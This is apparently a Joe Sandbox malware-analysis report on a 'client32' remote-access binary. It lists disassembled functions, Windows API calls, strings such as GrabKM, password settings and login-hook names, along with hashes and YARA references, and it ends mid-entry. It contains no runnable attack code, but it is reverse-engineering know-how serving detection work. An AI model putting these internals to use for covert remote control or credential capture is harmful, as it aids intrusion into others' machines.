                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                        • API String ID: 1609618855-357498123
                                                                                                                                        • Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                        • Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
                                                                                                                                        • Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                        • Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92
                                                                                                                                        Function 68906BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2163 68906ba0-68906c14 call 68914710 call 688f5e90 GetTickCount call 68909210 2170 68906fb9-68906fc9 call 689128e1 2163->2170 2171 68906c1a-68906c1c 2163->2171 2173 68906c26-68906c33 GetTickCount 2171->2173 2175 68906c42-68906c49 2173->2175 2176 68906c35-68906c3d call 68906940 2173->2176 2178 68906c50-68906c57 2175->2178 2179 68906c4b call 688f97c0 2175->2179 2176->2175 2180 68906c66-68906c6d 2178->2180 2181 68906c59-68906c61 Sleep 2178->2181 2179->2178 2184 68906c82-68906cc2 call 68913c10 select 2180->2184 2185 68906c6f-68906c7c WaitForSingleObject 2180->2185 2183 68906f97-68906f9e 2181->2183 2186 68906c20 2183->2186 2187 68906fa4-68906fb6 call 689128e1 2183->2187 2184->2187 2192 68906cc8-68906ccb 2184->2192 2185->2184 2186->2173 2193 68906ce4-68906ce6 2192->2193 2194 68906ccd-68906cdf Sleep 2192->2194 2193->2173 2195 68906cec-68906cf9 GetTickCount 2193->2195 2194->2183 2196 68906d00-68906d1c 2195->2196 2197 68906d22 2196->2197 2198 68906f89-68906f91 2196->2198 2199 68906d28-68906d2b 2197->2199 2198->2183 2198->2196 2200 68906d3d-68906d45 2199->2200 2201 68906d2d-68906d36 2199->2201 2200->2198 2202 68906d4b-68906d95 call 68913753 call 688f5c90 2200->2202 2201->2199 2203 68906d38 2201->2203 2208 68906d9b 2202->2208 2209 68906f4f-68906f7c GetTickCount InterlockedExchange call 689077e0 2202->2209 2203->2198 2210 68906dac-68906ded call 688f9310 2208->2210 2209->2183 2215 68906f7e-68906f83 2209->2215 2216 68906df3-68906e58 GetTickCount InterlockedExchange call 68913753 call 68913c10 2210->2216 2217 68906f3a-68906f46 call 688f30a0 2210->2217 2215->2198 2227 68906e5a-68906e5b 2216->2227 2228 68906e8b-68906e99 call 689028d0 2216->2228 2222 68906f47-68906f4c call 688fa4e0 2217->2222 2222->2209 2229 68906e76-68906e89 call 688f94e0 2227->2229 2230 68906e5d-68906e74 call 688f6f50 2227->2230 2234 68906e9e-68906ea4 2228->2234 2229->2234 2237 68906ea7-68906ebd call 689077e0 2230->2237 2234->2237 2240 68906f25-68906f38 call 688f30a0 2237->2240 2241 68906ebf-68906f1d InterlockedDecrement SetEvent call 689131a0 call 688f5c90 2237->2241 2240->2222 2248 68906da0-68906da6 2241->2248 2249 68906f23 2241->2249 2248->2210 2249->2209
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906BD5
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906C26
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 68906C5B
                                                                                                                                          • Part of subcall function 68906940: GetTickCount.KERNEL32 ref: 68906950
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000318,?), ref: 68906C7C
                                                                                                                                        • _memmove.LIBCMT ref: 68906C93
                                                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 68906CB4
                                                                                                                                        • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 68906CD9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906CEC
                                                                                                                                        • _calloc.LIBCMT ref: 68906D76
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906DF3
                                                                                                                                        • InterlockedExchange.KERNEL32(025E2F82,00000000), ref: 68906E01
                                                                                                                                        • _calloc.LIBCMT ref: 68906E33
                                                                                                                                        • _memmove.LIBCMT ref: 68906E47
                                                                                                                                        • InterlockedDecrement.KERNEL32(025E2F2A), ref: 68906EC3
                                                                                                                                        • SetEvent.KERNEL32(00000314), ref: 68906ECF
                                                                                                                                        • _memmove.LIBCMT ref: 68906EF4
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906F4F
                                                                                                                                        • InterlockedExchange.KERNEL32(025E2ECA,-6893A188), ref: 68906F60
                                                                                                                                        Strings
                                                                                                                                        • FALSE, xrefs: 68906E67
                                                                                                                                        • ProcessMessage returned FALSE. Terminating connection, xrefs: 68906F25
                                                                                                                                        • ReadMessage returned FALSE. Terminating connection, xrefs: 68906F3A
                                                                                                                                        • ResumeTimeout, xrefs: 68906BBA
                                                                                                                                        • httprecv, xrefs: 68906BDD
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68906E62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                                        • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                        • API String ID: 1449423504-919941520
                                                                                                                                        • Opcode ID: b6086a511ed1ba08a7423c00f021302e338edefb11e4481e3bace15697347414
                                                                                                                                        • Instruction ID: 1b421811a95e4261c5cc87845688a39023c4622d414b83e08194429189005260
                                                                                                                                        • Opcode Fuzzy Hash: b6086a511ed1ba08a7423c00f021302e338edefb11e4481e3bace15697347414
                                                                                                                                        • Instruction Fuzzy Hash: B2B17FB5D082689FDB31DB68CD44BEE77B8EB49348F404099E649E6240D7B4DAC4CF91
                                                                                                                                        Function 11085840 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2250 11085840-1108585d call 11085830 2253 1108585f-1108586f call 1115e4d1 2250->2253 2254 11085870-11085880 call 11141240 2250->2254 2259 11085882-1108588a 2254->2259 2259->2259 2260 1108588c-11085892 2259->2260 2261 11085893-11085899 2260->2261 2261->2261 2262 1108589b-110858d2 LoadLibraryA 2261->2262 2263 11085939-1108594e GetProcAddress 2262->2263 2264 110858d4-110858db 2262->2264 2267 110859dc-110859ed call 1115e4d1 2263->2267 2268 11085954-11085963 GetProcAddress 2263->2268 2265 110858dd-1108592e GetModuleFileNameA call 11080be0 LoadLibraryA 2264->2265 2266 11085930-11085933 2264->2266 2265->2266 2266->2263 2266->2267 2268->2267 2270 11085965-11085974 GetProcAddress 2268->2270 2270->2267 2273 11085976-11085985 GetProcAddress 2270->2273 2273->2267 2275 11085987-11085996 GetProcAddress 2273->2275 2275->2267 2276 11085998-110859a7 GetProcAddress 2275->2276 2276->2267 2277 110859a9-110859b8 GetProcAddress 2276->2277 2277->2267 2278 110859ba-110859c9 GetProcAddress 2277->2278 2278->2267 2279 110859cb-110859da GetProcAddress 2278->2279 2279->2267 2280 110859ee-11085a03 call 1115e4d1 2279->2280
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1108592C
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                        • API String ID: 2201880244-3035937465
                                                                                                                                        • Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                                        • Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
                                                                                                                                        • Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                                        • Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51
                                                                                                                                        Function 11105D40 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                        • GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                        • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 11105EDB
                                                                                                                                          • Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                          • Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                          • Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                          • Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11105EEF
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
                                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
                                                                                                                                          • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                          • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
                                                                                                                                          • Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                          • Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                          • Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
                                                                                                                                        • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                        • API String ID: 539809342-403456261
                                                                                                                                        • Opcode ID: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                                        • Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
                                                                                                                                        • Opcode Fuzzy Hash: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                                        • Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12
                                                                                                                                        Function 11136060 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76938400), ref: 11141740
                                                                                                                                          • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                          • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                                          • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                                        • PostMessageA.USER32(0001044C,000006CF,00000007,00000000), ref: 1113623F
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • SetWindowTextA.USER32(0001044C,00000000), ref: 111362E7
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 111363AC
                                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 111363DA
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11136408
                                                                                                                                        • EnableWindow.USER32(0001044C,00000001), ref: 11136417
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 11136468
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 11136475
                                                                                                                                        • EnableWindow.USER32(0001044C,00000000), ref: 11136489
                                                                                                                                        • EnableWindow.USER32(0001044C,00000000), ref: 111363EF
                                                                                                                                          • Part of subcall function 1112E330: ShowWindow.USER32(0001044C,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354
                                                                                                                                        • EnableWindow.USER32(0001044C,00000001), ref: 1113649D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                        • API String ID: 3453649892-3803836183
                                                                                                                                        • Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                        • Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
                                                                                                                                        • Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                        • Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791
                                                                                                                                        Function 11073B73 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 204threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000000C), ref: 11073B95
                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000024), ref: 11073B9B
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 11073BA1
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000DB1C), ref: 11073BAA
                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000054), ref: 11073BB0
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000006C), ref: 11073BB6
                                                                                                                                        • _strncpy.LIBCMT ref: 11073C18
                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,00000001,00000000), ref: 11073C7F
                                                                                                                                        • CreateThread.KERNEL32(00000000,00004000,Function_0006FD70,00000000,00000000,?), ref: 11073D1C
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000001,00000000), ref: 11073D23
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInitializeSection$CloseCreateEnvironmentErrorExitExpandHandleLastMessageProcessStringsThread_strncpywsprintf
                                                                                                                                        • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL$tj
                                                                                                                                        • API String ID: 2176893583-624511195
                                                                                                                                        • Opcode ID: 889e2c9f85ea8016a32cb5deea05d580a90b4bcc58e6bc18f7868a3592ec7294
                                                                                                                                        • Instruction ID: 96e53a99b37afd88effbccddcb99d5044153cbf19089882f4136f072ae1633ca
